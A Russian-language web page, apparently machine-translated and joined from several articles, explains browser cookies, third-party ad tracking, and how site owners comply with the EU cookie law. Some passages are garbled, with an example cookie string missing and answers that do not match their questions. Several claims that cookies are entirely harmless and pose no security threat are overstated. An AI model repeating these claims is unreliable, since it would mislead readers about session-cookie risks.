Файлы cookie — это очень маленькие текстовые файлы, размещаемые на вашем компьютере веб-сервером, когда вы просматриваете некоторые сайты в Интернете (не все веб-сайты размещают файлы cookie). Они используются для хранения данных о вас и ваших предпочтениях, чтобы веб-серверу не приходилось повторно запрашивать эту информацию, что может замедлить время загрузки.

Файлы cookie обычно используются для хранения личных регистрационных данных, таких как ваше имя, ваш адрес, содержимое корзины покупок, ваш предпочтительный макет веб-страницы, карта, которую вы можете просматривать, и т. Д.Они позволяют веб-серверам персонализировать информацию в соответствии с вашими конкретными потребностями и предпочтениями при посещении веб-сайта.

Рара Субэйр / EyeEm / Getty Images

Почему они называются файлами cookie?

Существуют разные объяснения того, откуда файлы cookie получили свое название. Некоторые люди считают, что термин произошел от «волшебных файлов cookie», которые являются частью операционной системы UNIX.

Другие считают, что название происходит от истории Гензеля и Гретель, которые смогли отметить свой путь через темный лес, бросив за собой крошки печенья.

Опасны ли компьютерные файлы cookie?

Самый простой ответ — файлы cookie сами по себе совершенно безвредны. Однако некоторые веб-сайты и поисковые системы используют их для отслеживания пользователей, просматривающих веб-страницы, сбора сугубо личной информации и часто тайной передачи этой информации на другие веб-сайты без разрешения или предупреждения. Вот почему мы часто слышим о веб-файлах cookie в новостях.

Могут ли файлы cookie использоваться для слежки за мной?

Файлы cookie — это простые текстовые файлы, которые не могут запускать программы или выполнять задачи.Их также нельзя использовать для просмотра данных на жестком диске или сбора другой информации с вашего компьютера.

Кроме того, к файлам cookie может получить доступ только сервер, который их инициировал. Это лишает возможности один веб-сервер отслеживать файлы cookie, установленные другими серверами, захватив конфиденциальные биты вашей личной информации.

Собственные и сторонние файлы cookie

Оба типа хранятся на вашем компьютере и используются по схожим причинам, но различаются в зависимости от того, кто создал cookie и как они используются.

Собственный файл cookie создается посещаемым вами веб-сайтом, а сторонний файл cookie создается другими сайтами с по сайта, который вы посещаете. Как мы уже говорили выше, к обоим типам может получить доступ только сервер, который их создал.

Использование сторонних файлов cookie не так очевидно, как файлов cookie первого лица, поскольку при посещении веб-сайта вы можете не предполагать, что есть сценарии, обрабатываемые внешними сайтами, которые сбрасывают файлы cookie на ваш компьютер.Они часто создаются с помощью кода, встроенного в сторонний инструмент или рекламу. Некоторые браузеры автоматически блокируют сторонние файлы cookie.

Что вызывает споры о файлах cookie в Интернете?

Хотя файлы cookie могут быть получены только сервером, который их установил, многие рекламные компании в Интернете прикрепляют файлы cookie, содержащие уникальный идентификатор пользователя, к рекламным баннерам. Многие крупные рекламные компании в Интернете размещают рекламу на тысячах различных веб-сайтов, поэтому они также могут получать свои файлы cookie со всех этих сайтов.Хотя сайт, на котором размещена реклама, не может отслеживать ваш прогресс в Интернете, компания, которая размещает рекламу, может.

Именно здесь в игру вступает боязнь сторонних файлов cookie. Но хотя это может показаться зловещим, отслеживание вашего прогресса в Интернете не обязательно так уж и плохо. Когда отслеживание используется на сайте, данные могут помочь владельцам сайтов настроить их дизайн, улучшить популярные области и устранить или переработать «тупики» для более эффективного взаимодействия с пользователем.

Данные отслеживания также можно использовать, чтобы предоставить вам и владельцам сайтов более целевую информацию или дать рекомендации по покупкам, контенту или услугам — функция, которую ценят многие.Например, одна из самых популярных функций розничной торговли Amazon.com — это целевые рекомендации, которые он дает для новых товаров на основе вашей истории просмотров и покупок.

Должен ли я отключить файлы cookie на моем компьютере?

Это вопрос, на который есть разные ответы в зависимости от того, как вы хотите использовать Интернет.

Если вы переходите на веб-сайты, которые значительно персонализируют ваш опыт, вы не сможете увидеть большую часть этого, если отключите или очистите файлы cookie.

Многие сайты используют эти простые текстовые файлы, чтобы сделать ваш сеанс просмотра веб-страниц максимально персонализированным и эффективным просто потому, что для пользователя гораздо удобнее не вводить одну и ту же информацию каждый раз при посещении.Если вы отключите файлы cookie в своем веб-браузере, вы не сможете сэкономить время, сэкономленное этими файлами cookie, и не получите полностью персонализированного опыта.

Вы можете реализовать частичную остановку веб-файлов cookie, установив в браузерах высокий уровень чувствительности, который будет предупреждать вас, когда будет установлен файл cookie, и позволит вам принять или отклонить их для каждого сайта. Однако, поскольку в наши дни очень многие сайты используют файлы cookie, частичный запрет, вероятно, заставит вас тратить больше времени на их принятие или отклонение, чем на то, чтобы наслаждаться временем в сети.Это компромисс, и он действительно зависит от вашего уровня комфорта.

Суть в следующем: файлы cookie действительно не причиняют вреда вашему компьютеру или вашему просмотру веб-страниц. Только тогда, когда рекламодатели не так этичны, как должны, с данными, хранящимися в ваших файлах cookie, все становится немного серым, и ваша конфиденциальность в Интернете начинает становиться проблемой. Тем не менее, ваша личная и финансовая информация в полной безопасности, и файлы cookie не представляют угрозы для безопасности.

Как управлять файлами cookie

Есть несколько способов избавиться от файлов cookie в вашем браузере.Чтобы принять их и использовать в обычном режиме, вам не нужно вносить какие-либо изменения в настройки веб-браузера или запрашивать их с сайта. Просто просматривайте в обычном режиме, и если веб-сайту нужно оставить файл cookie, он будет.

Однако у вас есть некоторый контроль над куки-файлами браузера. Возможно, вы хотите просматривать веб-страницы без сохранения файлов cookie или удалить файлы cookie браузера с определенного веб-сайта.

Веб-прокси — это один из способов использования Интернета без сохранения файлов cookie в вашем браузере.Однако не все прокси поддерживают их отключение, поэтому обязательно ищите эту функцию. Это чаще встречается с анонимными веб-прокси.

Другой способ — временно использовать файлы cookie, автоматически удаляя их, когда вы закончите работу с сайтом. Вы можете сделать это, используя веб-сайт в режиме приватного просмотра.

Или, если вы хотите использовать файлы cookie, чтобы сохранить вашу регистрационную информацию и использовать другие их преимущества, вы всегда можете вручную удалить их позже. Вы также можете очистить файлы cookie для одного конкретного сайта, чтобы это не повлияло на другие.

Вы также можете увидеть, какие файлы cookie хранятся в вашем браузере. То, как вы это делаете, отличается для каждого браузера (а некоторые вам не позволяют), но в Chrome, например, вы можете ввести chrome: // settings / siteData в качестве URL-адреса, чтобы сразу перейти к этим настройкам.

Файлы cookie: история

Изначально файлы cookie были разработаны, чтобы облегчить жизнь поисковикам. Популярные сайты, такие как Amazon, Google и Facebook, используют их для доставки настраиваемых личных веб-страниц, которые доставляют вам целевой контент.

К сожалению, некоторые веб-сайты и интернет-рекламодатели нашли им другое применение. Они могут собирать и собирают конфиденциальную личную информацию, которая может использоваться для профилирования вас с помощью рекламных объявлений, которые кажутся почти навязчивыми с точки зрения их целевой направленности.

Файлы cookie действительно предлагают ряд очень полезных преимуществ, которые делают просмотр веб-страниц более удобным. С другой стороны, вы можете быть обеспокоены тем, что ваша конфиденциальность может быть нарушена. Однако это не то, о чем вам обязательно стоит беспокоиться.Файлы cookie абсолютно безвредны.

Спасибо, что сообщили нам об этом!

Расскажите, почему!

Другой Недостаточно подробностей Сложно понять

Что такое «куки» в Интернете?

Файлы cookie почему-то приобрели довольно зловещий вид. Но они действительно просты и безвредны. (Обратите внимание, что этот вопрос стал настолько популярным, что HowStuffWorks теперь имеет полную статью о файлах cookie.)

Файл cookie — это всего лишь один или несколько фрагментов информации, хранящихся в виде текстовых строк на вашем компьютере.Веб-сервер отправляет вам файл cookie, а браузер сохраняет его. Затем браузер возвращает файл cookie на сервер при следующем обращении к странице.

Чаще всего файлы cookie используются для хранения идентификатора пользователя. Например, файл cookie может содержать следующую строку:

Amazon.com — один из сайтов, использующих эту технику. Когда вы заказываете книгу, вы заполняете форму, указав свое имя и адрес. Amazon присваивает вам идентификатор, сохраняет вашу информацию с этим идентификатором в своей базе данных на сервере и отправляет идентификатор в ваш браузер в виде файла cookie.Ваш браузер хранит идентификатор на вашем жестком диске. В следующий раз, когда вы перейдете на Amazon, идентификатор будет отправлен обратно на сервер. Сервер ищет вас по вашему идентификатору и настраивает веб-страницу, которую отправляет вам. Страница может сказать: «С возвращением, Джо Смит!»

Вам может быть интересно:

  • Есть ли что-то еще от файлов cookie, чем это? Нет. Это просто текстовые строки. На моей машине есть каталог c: \ windows \ cookies, содержащий все файлы cookie. Это небольшие текстовые файлы — вы можете открыть их и увидеть сохраняемые строки.
  • Вредно ли печенье? Нет. Это просто короткие текстовые строки, и они часто могут улучшить просмотр, позволяя серверу вызывать любую настроенную вами информацию.
  • Насколько распространены файлы cookie? Да. На моем жестком диске более 500 отдельных файлов cookie.
  • Могут ли файлы cookie передавать компьютерных вирусов ? Нет. Это просто текстовые строки.
  • Может ли компания прочитать мою личную информацию с моего жесткого диска с помощью файла cookie? №На сервер возвращается только тот cookie, который был отправлен в первую очередь. Он никоим образом не модифицируется и не подвергается манипуляциям.

Вот несколько интересных ссылок:

Окончательное руководство по законам ЕС о файлах cookie

Если у вас есть веб-сайт, можно с уверенностью сказать, что вы используете файлы cookie. Если вы живете в Европе и на вашем сайте используются файлы cookie, возможно, вы нарушаете закон.

Файлы cookie

стали неотъемлемой частью нашего опыта просмотра веб-страниц. Они позволяют веб-сайтам, которые мы посещаем чаще всего, отслеживать наши предпочтения, не заставляя нас каждый раз входить в систему.Они позволяют сайтам запоминать наши имена пользователей. Они позволяют интернет-магазинам отслеживать товары, которые мы положили в тележки для покупок. Они предоставляют необходимые данные для некоторых из самых популярных инструментов аналитики веб-сайтов. Во многих отношениях они заставляют Интернет работать так, как мы этого ожидаем.

Так почему же ЕС посчитал необходимым регулировать файлы cookie?

К сожалению, использование файлов cookie также вызывает ряд проблем с конфиденциальностью .

Файлы cookie для отслеживания — сторонние файлы cookie, размещаемые на сайтах в рекламных целях — могут собирать сведения о ваших привычках просмотра, видеть, какие продукты вы просматриваете и что покупаете.Они используют эту информацию для подачи вам целевой рекламы как на исходном сайте, который вы посетили, так и на любых других сайтах, на которых установлены такие же сторонние файлы cookie. Поэтому, если вы просматриваете SSD-диски на Amazon, вы можете начать видеть рекламу предложений SSD, когда просматриваете Facebook или посещаете свой любимый технический магазин.

Для некоторых пользователей Интернета это чрезвычайно полезно. Если вы пытаетесь найти лучшую цену для продукта, это стороннее дополнение может иметь именно то, что вы ищете.А для владельцев сайтов отслеживание файлов cookie может быть очень прибыльным. Чем более нацелены ваши объявления, тем больше шансов, что пользователи будут нажимать на них. Большинство интернет-пользователей в целом согласились с тем, что отслеживающие файлы cookie являются необходимым злом, чтобы наши любимые сайты были бесплатными.

Но для многих файлы cookie позволяют веб-сайтам легко отслеживать каждый наш шаг в Интернете и использовать нашу историю просмотров в личных целях.

В 2011 году Европейский Союз согласился. По их мнению, интернет-пользователи имеют право знать, какие файлы cookie используются посещаемыми веб-сайтами, а также возможность отказаться от этих файлов cookie при желании.

С принятием Директивы 2009/136 / EC, которая стала известна как Закон о файлах cookie , Европейский парламент обязал все страны в пределах ЕС принять законы, требующие от веб-сайтов получения информированного согласия, прежде чем они смогут хранить или получать информацию о компьютере посетителя или устройстве с доступом в Интернет.

Другими словами, если вы находитесь в Европе и размещаете веб-сайт, который использует файлы cookie, вы должны сообщить своим посетителям, что вы используете файлы cookie, сообщить им, для чего эти файлы cookie используются, и получить их согласие перед тем, как вы можете разместить файлы cookie на их устройстве .

Что такое законодательство ЕС о файлах cookie?

Законодательство ЕС о файлах cookie началось с директивы Европейского Союза, которая была направлена ​​на защиту конфиденциальности в Интернете. С тех пор все страны ЕС приняли некоторые вариации этой политики.

Законодательство ЕС о файлах cookie требует от владельцев веб-сайтов, которые используют файлы cookie, 4 действия:

  1. Когда кто-то посещает ваш веб-сайт, вы должны сообщить им, что ваш сайт использует файлы cookie .
  2. Вам необходимо предоставить подробную информацию о , как будут использоваться данные cookie.
  3. Вам необходимо предоставить посетителям какие-либо средства принятия или отказа от использования файлов cookie на вашем сайте.
  4. Если они откажутся, вы должны убедиться, что файлы cookie не будут размещены на их машине.

Как вы справитесь с этими требованиями, полностью зависит от вас, и мы обсудим некоторые из ваших вариантов позже. Важная часть состоит в том, что вы справляетесь с ними.

Некоторые файлы cookie не требуют согласия

Конечно, не все куки — зло. Фактически, некоторые из них необходимы для правильного функционирования веб-сайта.ЕС понимает это и делает исключение для файлов cookie, которые «строго необходимы» для выполнения услуг, запрашиваемых посетителями вашего сайта.

Это исключение особенно важно для интернет-магазинов. Когда вы посещаете свой любимый интернет-магазин, вы ожидаете, что товары, которые вы добавляете в корзину, останутся в вашей корзине покупок при оформлении заказа. Файлы cookie делают это возможным. Если бы вы отказались от этих файлов cookie, вы, по сути, отказались бы от самой причины, по которой вы изначально перешли на этот сайт.Спрашивать клиента, хотят ли они, чтобы их корзина работала с помощью файлов cookie, — все равно что спрашивать их, хотят ли они, чтобы нить скрепляла их рубашку.

Точный объем «строго необходимого» четко не определен. В приведенном выше случае любой, кто приходит на ваш сайт за покупками, ожидает, что корзина для покупок будет работать. Эти файлы cookie необходимы.

С другой стороны, предоставление вашим клиентам настраиваемого пользовательского опыта или индивидуальных предложений продуктов не является требованием для интернет-магазина, и файлы cookie, которые активируют эти функции, не подпадают под категорию «строго необходимых». Вам необходимо получить согласие, прежде чем использовать их .

Файлы cookie

, которые обеспечивают функции безопасности для веб-сайтов, где ожидается высокий уровень безопасности, таких как сайты онлайн-банкинга, также считаются строго необходимыми.

Точное руководство ЕС относительно «строго необходимого» исключения гласит:

«Это не должно препятствовать техническому хранению или доступу с единственной целью выполнения передачи сообщения по сети электронной связи или в случае крайней необходимости для поставщика услуг информационного общества, явно запрошенного подписчиком, или пользователь для предоставления услуги.»

Если вы не уверены, необходимы ли ваши файлы cookie, лучше проконсультироваться с местными регулирующими органами. Они могут предоставить дополнительную информацию и конкретные рекомендации для вашей страны. В общем, лучше проявить осторожность. Предположим, что это не так, если вы не уверены, что ваши файлы cookie строго необходимы.

Любой файл cookie, не подпадающий под определение «строго необходимый», требует согласия, прежде чем вы сможете сохранить его на устройстве посетителя.

Это не только для файлов cookie

Законодательство о файлах cookie не ограничивается файлами cookie.Фактически, файлы cookie никогда не упоминаются в самом регламенте. Существует множество способов хранения пользовательской информации, и многие из них включают отправку файлов на компьютер, телефон или планшет пользователя. Регламент намеренно избегает явного наименования какой-либо технологии, чтобы включить все такие технологии, а также технологии, которые еще предстоит создать.

Так что это значит? Файлы cookie являются наиболее распространенной технологией, используемой для хранения информации пользователей на их личных устройствах, поэтому регулирование широко известно как Закон о файлах cookie или Закон о файлах cookie.Однако любая другая технология, которая хранит информацию в веб-браузере пользователя или где-либо еще на его устройстве, должна быть раскрыта и получить одобрение.

Сюда входят такие инструменты, как Flash и локальное хранилище HTML5, оба из которых хранят информацию локально так же, как файлы cookie.

Это влияет на меня?

Это зависит от того, использует ли ваш веб-сайт файлы cookie. Скорее всего, есть, даже если вы этого не осознаёте.

Большинство современных систем управления контентом, таких как WordPress или Drupal, используют файлы cookie для проверки личности, входа в систему или отслеживания ваших комментариев.Программное обеспечение для ведения блогов, форумы и многие другие веб-приложения используют файлы cookie по многим из тех же причин. Интернет-магазины используют файлы cookie для всего: от корзины покупок до логинов пользователей и индивидуальных предложений продуктов. Если вы используете Google Analytics, Google AdSense или AdWords или плагины социальных сетей, такие как кнопки «Нравится», ваш веб-сайт использует файлы cookie. Если у вас есть встроенные видео YouTube или другой мультимедийный контент, они также могут содержать файлы cookie.

Если вы все еще не уверены, вы можете просмотреть файлы cookie на своем сайте с помощью Google Chrome.Просто откройте Инструменты разработчика и перейдите на вкладку Ресурсы. Здесь вы можете просмотреть любые файлы cookie на текущей странице. Обязательно посетите каждую страницу и проверьте все возможные точки взаимодействия: оставьте комментарий, войдите в систему, поставьте лайк на странице в Facebook и т. Д.

Если вы не нашли никаких файлов cookie, вам, вероятно, не о чем беспокоиться. Но если есть файлы cookie, пора рассмотреть ваши варианты.

Как мне соблюдать закон ЕС о файлах cookie?

Нормативы ЕС не устанавливают особых требований соответствия.Они просто устанавливают требования высокого уровня. Как вы их соблюдаете, во многом зависит от вас. Вот несколько вариантов:

Вариант 1. Избавьтесь от файлов cookie

Это кажется довольно очевидным, но может оказаться не так просто, как вы думаете. Если у вас простой статичный веб-сайт, избавиться от файлов cookie будет несложно. Используйте метод Google Chrome, описанный выше, чтобы выяснить, где существуют файлы cookie, и избавьтесь от этого кода. Это может быть так же просто, как удаление поля для комментариев или той редко используемой кнопки «Нравится».

Однако, если на вашем веб-сайте есть что-то более сложное, чем статический HTML, избавиться от файлов cookie будет намного сложнее, и вы должны учитывать, чем вы будете жертвовать в этом процессе. Если вы публикуете на своем сайте ежедневный блог, для комментариев необходимы файлы cookie. Вы хотите потерять комментарии только для того, чтобы не рассказывать своим посетителям о файлах cookie? Возможно нет.

Вариант 2 — Добавить всплывающее окно или аналогичную технологию

Нет никаких конкретных инструкций относительно того, как следует информировать пользователей или какую именно информацию вы должны им предоставить.Однако есть несколько общепринятых подходов.

Во-первых, вы должны сообщить пользователям, что используются файлы cookie. Это можно сделать с помощью всплывающего окна, панели заголовка или аналогичной технологии. На данном этапе формулировка не должна быть сложной или даже подробной. Подробности можно найти в другом месте. Важно то, что предупреждение существует и включает возможность отказаться от файлов cookie.

Если вы не уверены, как это будет выглядеть, есть отличный пример из ICO, регулирующего органа Великобритании, ответственного за соблюдение законодательства о файлах cookie.Когда вы впервые заходите на их веб-сайт, появляется следующее всплывающее окно:

Мы разместили файлы cookie на вашем устройстве, чтобы сделать этот веб-сайт лучше.

Вы можете использовать этот инструмент для изменения настроек файлов cookie. В противном случае мы будем считать, что вы готовы продолжить.

В используемом всплывающем окне / строке заголовка должно быть место, где пользователи могут дать согласие на использование файлов cookie или отказаться от них. Если пользователи игнорируют предупреждение, вы можете предполагать согласие.

Вариант 3 — Получите подразумеваемое согласие

В зависимости от толкования закона в вашей стране вам может потребоваться только «подразумеваемое согласие пользователя».«Вместо того, чтобы заставлять каждого пользователя нажимать кнопку« принять »перед тем, как он сможет получить доступ к вашему сайту, вы можете вместо этого отобразить короткое сообщение, информирующее их об использовании файлов cookie, обычно через панель заголовка или какой-либо другой необструктивный метод. По истечении заранее определенного периода времени, которое может длиться всего несколько секунд, объявление может исчезнуть. Если пользователь остается на вашем сайте, подразумевается согласие.

Это метод, который использует правительство Великобритании; однако, прежде чем вы решите выбрать этот маршрут, вам следует проконсультироваться с местным регулирующим органом, чтобы убедиться, что он соответствует требованиям вашей страны.

Вариант 4 — Добавьте его к своим Условиям использования

Включение всплывающего окна может не обеспечить наилучшего взаимодействия с пользователем, поэтому некоторые компании решили включить раскрытие файлов cookie в свои Условия и положения. Это может быть очень эффективным и ненавязчивым методом, но есть несколько предостережений.

Во-первых, пользователи должны согласиться на использование файлов cookie, поэтому, если вы включите информацию в свои Условия и положения, вам понадобится способ, которым пользователи могут утвердить ваши Условия и положения. Обычно это делается в процессе регистрации или регистрации.Если ваш веб-сайт не требует от пользователей регистрации, этот вариант, вероятно, вам не подойдет.

Во-вторых, вы не можете просто добавить язык cookie к существующим Условиям использования, потому что вам нужно получить согласие специально на использование файлов cookie. Это означает, что если у вас уже есть пользователи, которые согласились с вашими Условиями и Условиями, после добавления языка файлов cookie вам необходимо будет предложить им просмотреть и принять новые Условия.

Вариант 5. Получите программу, которая сделает это за вас

Существует множество приложений и подключаемых модулей, которые помогут вам соблюдать законы о файлах cookie.В зависимости от программы они могут помочь вам с такими задачами, как идентификация файлов cookie на вашем веб-сайте, создание подробного списка того, как используются ваши файлы cookie, информирование пользователей об использовании файлов cookie и получение их согласия. Некоторые программы даже изменяют настройки и информацию при изменении файлов cookie.

Мы предлагаем решение для получения согласия на использование файлов cookie, чтобы помочь вам соответствовать требованиям. Просто проверьте верхнюю часть веб-сайта, чтобы найти ссылку и приступить к работе.

Когда получать согласие

Согласие должно быть получено при первом посещении пользователем вашего сайта .

Его не нужно получать при повторных посещениях (вы должны иметь возможность идентифицировать постоянных посетителей благодаря файлам cookie). После получения согласия вы можете предположить, что пользователь соглашается на использование тех же файлов cookie каждый раз, когда они возвращаются.

Вам также не нужно получать согласие каждый раз, когда вы меняете файлы cookie. Если вы уже объяснили назначение файлов cookie на своем веб-сайте, изменение этих файлов cookie не является нарушением исходного соглашения, если вы не внесли существенных изменений в способ использования информации файлов cookie.В этом случае вам нужно будет еще раз запросить согласие пользователей.

Предоставление информации о файлах cookie

Независимо от метода, который вы используете для получения согласия, вам все равно необходимо предоставить подробную информацию о типах файлов cookie, которые вы используете, и о том, как они используются. Это можно сделать на отдельной странице раскрытия информации о файлах cookie, в отдельной Политике использования файлов cookie или в рамках Политики конфиденциальности или Условий использования вашего сайта. Где бы вы ни хранили эту информацию, она должна быть доступна по ссылке, расположенной на каждой странице вашего сайта.

Как и все остальное в этом законодательстве, нет никаких подробностей относительно того, какая информация должна быть предоставлена. Однако лучший способ действий — подробно описать типы файлов cookie, которые вы используете, и то, как используется информация из каждого из этих типов файлов cookie. Вам не нужно подробно описывать каждый файл cookie на вашем веб-сайте, поскольку многие из них, по сути, делают одно и то же.

Тем не менее, особенно важно обращать внимание на любые сторонние файлы cookie, которые могут присутствовать, поскольку именно здесь вы, вероятно, столкнетесь с наибольшими проблемами из-за несоблюдения.

Также может быть хорошей идеей предоставить некоторую информацию о том, что такое файлы cookie, хотя это не является обязательным требованием. Чем больше информации вы предоставите посетителям своего сайта, тем комфортнее будут чувствовать себя те, кто заинтересован в файлах cookie. Доступно много информации обо всех типах файлов cookie, поэтому воспользуйтесь возможностью, чтобы обучить своих пользователей.

После того, как вы внедрили процесс раскрытия файлов cookie, убедитесь, что вы регулярно проверяете свой сайт на предмет изменений и обновляете любую соответствующую информацию о файлах cookie для соответствия.

Общие сведения о файлах cookie

Что такое cookie?

Cookie — это не что иное, как очень маленький текстовый файл. Когда вы посещаете веб-сайт, сервер, на котором размещен этот сайт, размещает этот файл на вашем компьютере, обычно где-то в файлах настроек вашего браузера. Попадая на ваш компьютер, cookie-файл играет роль бонусной карты, которая может быть у вас в местном продуктовом магазине. Вы не получите с ним бесплатный кофе, но в следующий раз, когда вы посетите этот веб-сайт, файл cookie позволит сайту узнать, кто вы и любую другую соответствующую информацию, необходимую для персонализации вашего взаимодействия с пользователем.

Точная информация, хранящаяся в файле cookie, будет варьироваться от сайта к сайту в зависимости от того, какая информация необходима для конкретного просмотра. В большинстве случаев он каким-то образом идентифицирует вас. Например, если сайт требует входа в систему, файл cookie может позволить вам оставаться в системе или, по крайней мере, позволить сайту запомнить ваше имя пользователя. Если вы всегда используете один и тот же сайт погоды для получения местного прогноза, файлы cookie позволяют этому веб-сайту запоминать ваше местоположение, поэтому вам не придется каждый раз вводить его повторно.

Сайты, использующие рекламные файлы cookie, могут размещать информацию о просмотренных или приобретенных вами товарах, которую затем можно использовать для настройки рекламы, которую вы видите в будущем. Возвращаясь к нашей аналогии с карточкой магазина, это очень похоже на то, как ваш продуктовый магазин дает вам купоны на свои специальные кофейные зерна Starbucks, потому что в прошлый раз, когда вы были в магазине, вы купили банку Folgers.

Типы файлов cookie

Существует три основных типа файлов cookie.

Сеансовые файлы cookie — это временные файлы cookie.Они хранят информацию о вашем текущем сеансе, а затем стираются, когда ваш браузер закрывается. Эти типы файлов cookie часто используются для отслеживания таких вещей, как товары, которые вы кладете в корзину, или для хранения временной информации безопасности, которая может потребоваться при доступе к веб-сайту вашего банка. Вот почему, когда вы выходите с сайта своего банка, он обычно советует вам закрыть окно браузера. Это приведет к удалению всех файлов cookie сеанса. Сеансовые файлы cookie с наименьшей вероятностью вызывают проблемы с конфиденциальностью, и многие из них попадают в эту категорию «строго необходимых».

Постоянные файлы cookie , иногда называемые постоянными или сохраненными файлами cookie, размещаются на жестком диске вашего устройства и не удаляются при закрытии браузера. Эти файлы cookie могут использоваться для распознавания пользователей, когда они возвращаются на ваш сайт, отслеживания их шаблонов просмотра на вашем сайте, чтобы улучшить взаимодействие с пользователем, и предоставления данных для ваших программ аналитики. Постоянные файлы cookie могут хранить информацию в течение неопределенного времени, поэтому они очень полезны при попытке создать индивидуальный пользовательский интерфейс или проанализировать поведение возвращающихся посетителей.Они также могут использоваться в рекламных целях и, когда присутствует сторонняя реклама, могут привести к передаче вашей пользовательской информации или информации о компьютере другим веб-сайтам. Именно здесь в игру вступает большая часть озабоченности по поводу конфиденциальности файлов cookie.

Независимые от браузера файлы cookie , такие как файлы cookie Flash или Silverlight, во многом похожи на постоянные файлы cookie, за исключением того, что они не хранятся в вашем браузере. Вместо этого они хранятся в соответствующих программных файлах. Это усложняет их удаление, поскольку вам может потребоваться установить отдельную программу, например Adobe Flash Cookie Remover.Для владельцев веб-сайтов они могут предоставить ценный инструмент, поскольку их можно использовать для резервного копирования традиционных данных файлов cookie. Таким образом, даже если пользователь удалит свои файлы cookie, ваш веб-сайт все равно сможет их распознать и обеспечить тот же пользовательский интерфейс, извлекая информацию из файла cookie Flash. Конечно, если вы используете на своем сайте файлы cookie, не зависящие от браузера, вам необходимо сообщить об этом.

Блокировка файлов cookie

Все современные браузеры предоставляют пользователям метод блокировки файлов cookie.Обычно это часть настроек безопасности или конфиденциальности. В некоторых случаях это просто опция «Не отслеживать», которая предназначена для того, чтобы сообщить веб-сайтам, что вы не хотите получать сторонние файлы cookie для отслеживания. Нет никакой гарантии, что этот параметр будет соблюден, но, поскольку вы просматриваете эту страницу, рекомендуется убедиться, что ваш веб-сайт поддерживает.

В некоторых случаях браузеры могут быть настроены на автоматическую блокировку различных типов файлов cookie. Chrome, например, позволяет пользователям сбрасывать локальные данные при выключении вашего браузера, блокировать сайты от размещения каких-либо данных на вашем компьютере или блокировать все сторонние файлы cookie.Законодательство ЕС позволяет использовать эти параметры при определении согласия; однако не все браузеры позволяют пользователям устанавливать такие специфические параметры, поэтому не следует полагаться на это в целях соблюдения требований.

Что произойдет, если пользователь откажется от участия?

Если ваши пользователи решат отказаться от файлов cookie на вашем сайте, у вас есть несколько различных вариантов обработки их запросов.

Самый простой вариант — ничего не делать. Просто сообщите пользователю, что используются файлы cookie, и он должен сделать следующий шаг.Если они не хотят принимать ваши файлы cookie, они могут покинуть ваш сайт или обновить настройки своего браузера. Этот вариант означает меньше работы для вас, но не обеспечит наилучшего взаимодействия с пользователем.

Шаг выше, чтобы предоставить пользователям информацию о том, как обновить настройки их браузера. Многие сайты предоставляют подробную информацию для большинства браузеров. Вы можете сделать ссылку на один из этих сайтов или создать собственное аналогичное руководство. Ваше руководство может появиться во всплывающем окне после того, как пользователь откажется от согласия, или оно может быть частью вашей Политики конфиденциальности, страницы информации о файлах cookie или отдельной отдельной страницы.

Если вы хотите упростить взаимодействие с пользователем, вы также можете настроить свой веб-сайт на отключение файлов cookie, когда пользователь отказывается от согласия. Или, что еще лучше, разрешите пользователю выбрать, с каким типом файлов cookie он согласен, и отключите все остальные.

Это может быть немного сложно, особенно если вы не очень разбираетесь в технологиях. К счастью, многие приложения для проверки файлов cookie могут сделать это за вас. Такой подход обеспечит лучший общий пользовательский опыт и минимальную вероятность того, что пользователи просто покинут ваш сайт.Тем не менее, это, вероятно, также приведет к более высокому или частичному отказу от рассылки. Если вы в значительной степени полагаетесь на файлы cookie для аналитики или получения прибыли от сторонней рекламы, это может быть не лучшим вариантом для вашего сайта.

С какими штрафами могут столкнуться владельцы веб-сайтов, если они не соблюдают правила?

Поскольку Законодательство ЕС о файлах cookie не является законом, оно не устанавливает каких-либо конкретных штрафных санкций. Вместо этого он требует от местных органов власти устанавливать свои собственные законы и соответствующие наказания. Это означает, что потенциальные штрафы, с которыми вы столкнетесь за несоблюдение, будут зависеть от того, где вы живете.

Но в большинстве случаев, если вы не соблюдаете нормативные требования, местные регулирующие органы, скорее всего, предпримут одно из следующих действий:

Запросить информацию — Прежде чем ваш местный регулирующий орган начнет запрашивать изменения, он может попросить вас предоставить некоторую дополнительную информацию. Это может включать в себя особенности типов файлов cookie, используемых вашим сайтом, ссылки на раздел информации о файлах cookie или что-либо еще, что может помочь им определить, соответствует ли ваш сайт требованиям или необходимо ли приложить дополнительные усилия.

Запрос на изменения — Если ваш местный регулирующий орган определит, что ваш сайт не соответствует требованиям, он, скорее всего, попросит вас предпринять какие-либо действия, чтобы сделать его совместимым. Считайте это своим дружеским предупреждением. Если вы еще не добавили всплывающее окно согласия, самое время это сделать.

Принудительное применение — это не очень приятный запрос на изменение. На этом этапе местный регулятор сообщит вам о конкретных действиях, которые необходимо выполнить в течение установленного периода времени.Если вы до сих пор не упомянули эти Google Рекламы на своей странице информации о файлах cookie, теперь вам это абсолютно необходимо. Если вы не подчинитесь, вас могут привлечь к уголовной ответственности.

Штрафы — Руководящие принципы, определяющие право на наложение штрафа, различаются от страны к стране, как и максимальная сумма штрафа, которую вы можете получить. Для получения более подробной информации обратитесь к местному регулирующему органу. Или, что еще лучше, убедитесь, что ваш сайт соответствует требованиям, чтобы не беспокоиться о штрафах.

Есть еще один последний штраф, с которым вы лично никогда не столкнетесь, но о нем стоит упомянуть.Если ваш местный регулирующий орган не сможет обеспечить соблюдение законодательства о файлах cookie, он также может столкнуться с штрафами или другими санкциями. Поэтому, прежде чем вы отправитесь на ICO, чтобы поделиться своим мнением, помните, что они должны обеспечивать соблюдение этих правил, хотят они того или нет.

Сообщение сайта о несоблюдении

В зависимости от того, как вы относитесь к Закону о файлах cookie, вам может быть интересно, почему кто-то может сообщать о несоблюдении сайта. Независимо от того, поддерживаете ли вы правила или нет, существуют проблемы с конфиденциальностью, связанные с использованием файлов cookie, особенно сторонних файлов cookie, и любой веб-сайт, который намеренно скрывает использование файлов cookie от посетителей, заслуживает некоторого внимания.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *